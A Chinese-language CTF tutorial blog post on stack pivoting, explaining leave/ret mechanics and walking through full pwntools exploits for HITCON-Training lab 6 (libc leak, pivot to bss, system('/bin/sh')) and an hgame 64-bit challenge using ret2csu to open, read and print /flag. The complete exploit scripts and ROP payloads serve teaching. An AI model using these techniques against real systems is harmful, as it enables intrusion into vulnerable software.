32位以及64位栈迁移的具体分析与学习 / 开普饭

前言

这次来学习下栈迁移技术吧，全片构成为先了解原理，然后再分别以 32位程序及64位程序以图文的形式来具体学习！

原理

栈迁移正如它所描述的，该技巧就是劫持栈指针指向攻击者所能控制的内存处，然后再在相应的位置进行 ROP。我们可利用该技巧来解决栈溢出空间大小不足的问题。

我们进入一个函数的时候，会执行call指令

call func(); //push eip+4; push ebp; mov ebp,esp;

call func() 执行完要退出的时候要进行与call func相反的操作（恢复现场）维持栈平衡！

leave; //mov esp,ebp; pop ebp;

ret ; // pop eip

栈迁移的核心思想就是将栈的 esp 和 ebp 转移到一个输入不受长度限制的且可控制的址处，通常是 bss 段地址！在最后 ret 的时候如果我们能够控制得了栈顶 esp指向的地址就想到于控制了程序执行流！

这里有个很好的描述，建议大家可以去看下：https://blog.csdn.net/yuanyunfeng3/article/details/51456049

32位程序栈迁移

这里我拿 HITCON-Training-master 中的lab 6进行超详细的分析，希望能给在学这个内容的兴趣者们提供帮助！

file migration

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked,

interpreter /lib/ld-,for GNU/Linux 2.6.32,

BuildID[sha1]=e65737a9201bfe28db6fe46f06d9428f5c814951, not stripped

checksec migration

Arch: i386-32-little

RELRO: Full RELRO

Stack: No canary found

NX: NX enabled

PIE: No PIE (0x8048000)

开启了 NX保护的32位的elf程序

拖入ida：

int __cdecl main(int argc, const char **argv, const char **envp)

{

char buf; // [esp+0h] [ebp-28h]

if ( count != 1337 )

exit(1);

++count;

setvbuf(_bss_start, 0, 2, 0);

puts("Try your best :");

return read(0, &buf, 0x40u); //存在栈溢出漏洞

}

程序流程很简单我们想栈中最多输入 0x40 字节内容，然后停止 ! 程序不循环！

我们进入一个函数的时候，会执行 call 指令

call func(); //push eip+4; push ebp; mov ebp,esp;

call func()执行完要退出的时候要进行与call func 相反的操作（恢复现场）维持栈平衡！

leave; //mov esp,ebp; pop ebp;

ret ; // pop eip

我们首先先把完整的exp放上来然后分步详细地对其进行讲解！

#coding:utf8

from pwn import*

context.log_level="debug"

p = process('./migration')

libc = ELF('/lib/i386-linux-gnu/libc.so.6')

elf = ELF('./migration')

read_plt = elf.symbols['read']

puts_plt = elf.symbols['puts']

puts_got = elf.got['puts']

read_got = elf.got['read']

buf = elf.bss() + 0x500

buf2 = elf.bss() + 0x400

pop_ebx_ret = 0x804836d

pop_esi_edi_ebp_ret = 0x8048569

leave_ret = 0x08048418 #ida 中查看

puts_libc = libc.symbols['puts']

system_libc = libc.symbols['system']

binsh_libc = libc.search("/bin/sh").next()

log.info("read_plt:"+hex(read_plt))

log.info("puts_plt:"+hex(puts_plt))

log.info("puts_got:"+hex(puts_got))

log.info("read_got:"+hex(read_got))

log.info("buf:"+hex(buf))

log.info("buf2:"+hex(buf2))

log.info("pop_ebx_ret:"+hex(pop_ebx_ret))

log.info("pop_esi_edi_ebp_ret:"+hex(pop_esi_edi_ebp_ret))

log.info("leave_ret:"+hex(leave_ret))

log.info("puts_libc:"+hex(puts_libc))

log.info("system_libc:"+hex(system_libc))

#gdb.attach(p,'b *0x080484EA')

p.recvuntil("Try your best :\n")

log.info("***第一个讲解：将栈中 esp,ebp 转移到 bss 地址处*********************")

payload_1 = 'a'*0x28 + p32(buf) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) + p32(0x100)

p.send(payload_1)

log.info("*****第二个讲解：泄露libc_base********************")

payload_2 = p32(buf2) + p32(puts_plt) + p32(pop_ebx_ret) + p32(puts_got) + p32(read_plt) + p32(leave_ret)

payload_2+= p32(0) + p32(buf2) + p32(0x100)

p.send(payload_2)

puts_add = u32(p.recv(4))

libc_base = puts_add - puts_libc

log.info("libc_base:"+hex(libc_base))

system_add = libc_base + system_libc

log.info("system_add:"+hex(system_add))

binsh_addr = libc_base + binsh_libc

log.info("**************获得shell*********************")

payload_3 = p32(buf) + p32(system_add) + 'bbbb' + p32(binsh_addr)

p.send(payload_3)

p.interactive()

这个程序的gadget很少，但刚刚够用：

$ ROPgadget --binary migration --only 'pop|ret'

Gadgets information

============================================================

0x0804856b : pop ebp ; ret

0x08048568 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret

0x0804836d : pop ebx ; ret

0x0804856a : pop edi ; pop ebp ; ret

0x08048569 : pop esi ; pop edi ; pop ebp ; ret

0x08048356 : ret

0x0804842e : ret 0xeac1

Unique gadgets found: 7

运行后的

讲解 1

payload_1 = 'a'*0x28 + p32(buf) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) + p32(0x100)

p.send(payload_1)

我们可以往栈上输入0x40字节内容，从ida中可以知道我们其实当输入 0x28字节内容之后，如果再输入就是要覆盖ebp地址了，接着是ret_addr.输入输入到栈上的对应关系就是这个样子：

EBP：0xff8845b8

ESP: 0xff884590

leave; //mov esp,ebp; pop ebp;

ret ; // pop eip 因为pop出栈了，所以ESP地址在这里也会 +4

所以，执行完这两条命令后，

EBP：0x804a50c //即目前我们 ebp 已经被转移到 bss_addr+0x500处了！

ESP: 0xff8845b8+4 +4=0xff8845c0

注意，执行完后 ret 指令使得程序返回到了0x8048380 处然后执行 read_plt(0,buf,0x100) 去了！

所以我们是在向 buf：0x804a50c（ bss_addr+0x500）即 ebp 地址处写入 payload_2 后才会返回 ret去执行当前栈顶地址处的 leave //这也是图中说待会的原因！

所以此时 0x804a50c处已经被写入了buf2 = elf.bss() + 0x400 即 0x804a40c

然后去执行栈顶处的 leave

leave; //mov esp,ebp; pop ebp;

ret ; // pop eip 因为pop出栈了，所以ESP地址在这里也会 +4

猜测执行过后的结果为下面的样子：

esp: 0x804a50c - 4-4 = 0x804a514

ebp: 0x804a40c

看下面截图，发现符合我们的推测！

图中 0x804838c（put_plt 的地址）是我们 payload_2中发送的内容。

这里我们要特别注意一点，在leave 执行的时候，（看它本质）当 mov esp,ebp 后就已经实现将 esp 控制在 ebp处了，即再执行 ret 命令的话，就已经完成了将eip 控制在一个输入不受长度限制且可 rwx 处的地址了，那么此时 leave 本质中的 pop ebp 就是多余的了吗？

嗯...,因为目前我们还只是完成了栈的一次迁移，还没有进行攻击呢，要想攻击，我们还得获得 libc 加载的基地址，继而拿到 system 函数加载地址和 '/bin/sh\x00'字符串地址才可以！

于是我们需要接着利用这个 pop ebp 指令，向 ebp 传值 buf2（0x8049fe8）接着迁移，目的是利用 puts函数泄露 puts_got.

讲解二：

payload_2 = p32(buf2) + p32(puts_plt) + p32(pop_ebx_ret) + p32(puts_got) + p32(read_plt) + p32(leave_ret)

payload_2+= p32(0) + p32(buf2) + p32(0x100)

p.send(payload_2)

顺着上面接着分析，此时程序在执行 puts(puts_got) ，我们可以利用程序输出的结果（puts函数在内存中的加载地址）进而计算出 libc加载的基地址（上面说过了，哈）。

这里的 pop_ebx_ret 的作用呢其实就是把 p32(puts_got) 给从栈中取出来，进而实现接下来执行 read_plt(0,buf,0x100) 函数构造最后的攻击代码，即我们的 payload_3。

payload_3 = p32(buf) + p32(system_add) + 'bbbb' + p32(binsh_addr)

所以再当执行到 payload_2 中的 leave_ret 时buf2 （0x804a40c）处即 ebp的地址已经写入了 0x804a50c （buf）

read函数结束后，我们又要接着执行，我们构造的leave_ret 了

leave; //mov esp,ebp; pop ebp;

ret ; // pop eip 因为pop出栈了，所以ESP地址在这里也会 +4

推测执行后：

ebp=0x804a50c

esp= 0x804a40c+4 +4 =0x804a414

这里 leave 本质中的 pop ebp 就是其实就是把 0x804a50c又赋值给ebp 了

我们最后来看下 payload_3 leave指令完成后 ret当栈顶 system_addr处，

payload_3 = p32(buf) + p32(system_add) + 'bbbb' + p32(binsh_addr)

即可以直接执行拿到shell 了！

64位栈迁移

理解 32的栈迁移后 64位就容易理解了

它们原理其实和32位程序差不多，最大的区别应该就是它们调用函数时传参的方式不一样！

32位是将参数依次从右向左放入栈中。

64位程序传参的时候是从左到右依次放入寄存器：rdi，rsi，rdx，rcx，r8，r9 ，当参数大于等于 7 的时候后面参数会依次从右向左放入栈中！

在64位栈迁移的姿势常会使用 libc_csu_init 中的 gadgets，下面这题 hgame week3 中的 ROP 就是这样！这里就主要讲其中的栈迁移的部分了！

这题其实我没有做得出来，是比赛结束后看大考捞的博客才复现出来的，我太弱了！参考：大佬博客！！！

https://fmyy.pro/2020/01/22/Competition/HGame/#Week-THR

首先拖入ida：

ida 中看，我们可以执行两次输入，第一次向bss 段做多可写 0x100字节的内容！

第二次向栈中最多输入 0x60字节内容，存在栈溢出，可覆盖

rbp 和ret_addr但因为沙箱原因，禁用用了 execve 函数，我们于是可以利用利用ORW直接读flag文件，溢出空间但太小这里我们考虑栈迁移到bss 段上然后在rop攻击！

首先打开服务器中 flag文件然后再把里面的内容给打印到屏幕上！

#coding:utf8

from pwn import *

context(arch="amd64",os='linux',log_level="debug")

p = process('./ROP')

#p = remote('47.103.214.163',20300)

elf = ELF('ROP')

puts_plt = elf.plt['puts']

open_got = elf.got['open']

read_got = elf.got['read']

leave_ret = 0x40090D

buf = 0x6010A0 #ida

pop_rdi_ret = 0x400A43 #ROPgadget --binary ROP --only "pop|ret"

pop_rbx_rbp_r12_r13_r14_r15_ret = 0x400A3A # csu_gadget 第二段

FLAG = elf.bss()+0x200

print hex(elf.bss())

log.info("puts_plt:"+ str(hex(puts_plt)))

log.info("open_got:"+ str(hex(open_got)))

log.info("read_got:"+ str(hex(read_got)))

log.info("leave_ret:"+ str(hex(leave_ret)))

log.info("buf:"+ str(hex(buf)))

log.info("pop_rdi_ret:"+ str(hex(pop_rdi_ret)))

log.info("pop_rbx_rbp_r12_r13_r14_r15_ret:"+ str(hex(pop_rbx_rbp_r12_r13_r14_r15_ret)))

log.info("FLAG:"+ str(hex(FLAG)))

print "****************************************************************************************"

#gdb.attach(p)

p.recvuntil('It's just a little bit harder...Do you think so?')

payload = '/flag\x00\x00\x00'

payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)+p64(0)+p64(1)+p64(open_got)+p64(0)+p64(0)+p64(buf)+p64(0x400A20)+2*p64(0)+p64(1)+p64(0)*(6+1-3)

payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret+2)+p64(read_got)+p64(0x20)+p64(FLAG)+p64(4)+p64(0x400A20)+2*p64(0)+p64(1)+p64(0)*(6+1-3)

payload += p64(pop_rdi_ret)+p64(FLAG)+p64(puts_plt)

p.send(payload)

p.recvuntil('\n')

payload_2 = 'U'*0x50 + p64(buf)+p64(leave_ret) #栈迁移关键！是不是和32 位的栈迁移利用惊奇的相似，利用原理都是一样的

p.sendline(payload_2)

p.recv(100)

#p.close()

p.interactive()

ida中最后一个read 函数存在栈溢出漏洞，我们控制 ebp从而进行栈迁移当我们发送 payload_2 后

buf 就覆盖了原本的 rbp 的内容，而leave_ret 就覆盖了原本的ret_addr 处的内容！看下图，

这里便是实现了执行 2 次 leave ,（在本来程序结束前有执行了一次）达到栈迁移的实现！

执行第一次 leave的时候重点观察上图中黄色框框中的变化！

leave; //mov rsp,rep; pop rbp; 因为pop ebp，所以 rsp 要+8

ret ; // pop rip

当执行过leave后推测

rsp：rsp=0x7ffda85406b0+8 即 0x7ffda85406b8

rbp：rbp = 0x6010a0

验证下：

哦哦，上图执行ret后，因为本质是pop rip ，所以rsp + 8

rsp：rsp=0x7ffda85406b8+8 即 0x7ffda85406c0

rbp：rbp = 0x6010a0

所以当接下来 ret 到栈顶位置指向的地址 0x40090d ，便又要执行一次 leave，在这个leave后仍然有个 ret 。

继续推测下执行这个（我们构造的） leave 后的 rsp 和 rbp 吧！

rsp：rsp=0x6010a0+8 即 0x6010a8

rbp：rbp = 0x67616c662f //此为第一个payload 第一个的 8字节内容

然后 ret

rsp：rsp=0x6010a8+8 即 0x6010b0 //(buf+16)

rbp：rbp = 0x67616c662f //此为第一个payload 第一个的 8字节内容

所以，基于上面分析，再执行一次 leave 便可以将使得 rsp 的地址位于 bss段上去了，然后再ret 返回到 rsp执行到地址内容，就实现了一次栈迁移了。

现在的时候，我们就可以几乎没有输入长度的限制而去构造rop了，然后便可以利用rop 攻击链把flag中文件 open到文件操作符 4 中（因为前面程序已经用 open 打开一次some_life_experience了），为了接下来大家理解学习通常，我把上第一个 payload 放在这里

payload = '/flag\x00\x00\x00'

payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)+p64(0)+p64(1)+p64(open_got)+p64(0)+p64(0)+p64(buf)+p64(0x400A20)+2*p64(0)+p64(1)+p64(0)*(6+1-3)

payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret+2)+p64(read_got)+p64(0x20)+p64(FLAG)+p64(4)+p64(0x400A20)+2*p64(0)+p64(1)+p64(0)*(6+1-3)

payload += p64(pop_rdi_ret)+p64(FLAG)+p64(puts_plt)

这个主要就说再说下payload中的 0x400A20其实就是 libc_csu_init gadget中的 0x400A44 返回到的地址处！为了实现对参数的赋值。这是栈溢出中的ret2csu 具体可在ctfwiki中学下

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium-rop-zh/

400a3a处执行完 ret 返回到400A20

到 call qword[r12 + rbx*8] 因为 rbx被我们值为 0了相当于执行 open（"/flag",0,0）了。

所以会返回 4 赋值给rax ，因为在程序最开始已经使用open函数打开一次some_life_experience文件了。

因为 rbx+1 = rbp 所以在地址 0x400a29处并不会进行 call 操作，继续向下执行，也就是意味着我们可以再次构造。

就是构造再从文件操作符 4 read 到 flag 地址处，最后再调用 puts 函数把它打印到屏幕上！因为主要讲栈迁移的，后面就不说了，大家可以自己调试学习下。

多调试

这次主要是学习栈迁移的，建议初学者的话，亲自多调试调试或者在纸上用笔画一画，更有助理解，我最初学这部分时也是迷瞪好久，希望可以这篇可以给你们带来些帮助！

32位以及64位栈迁移的具体分析与学习

前言

原理

32位程序 栈迁移

多调试

相关推荐

32位程序栈迁移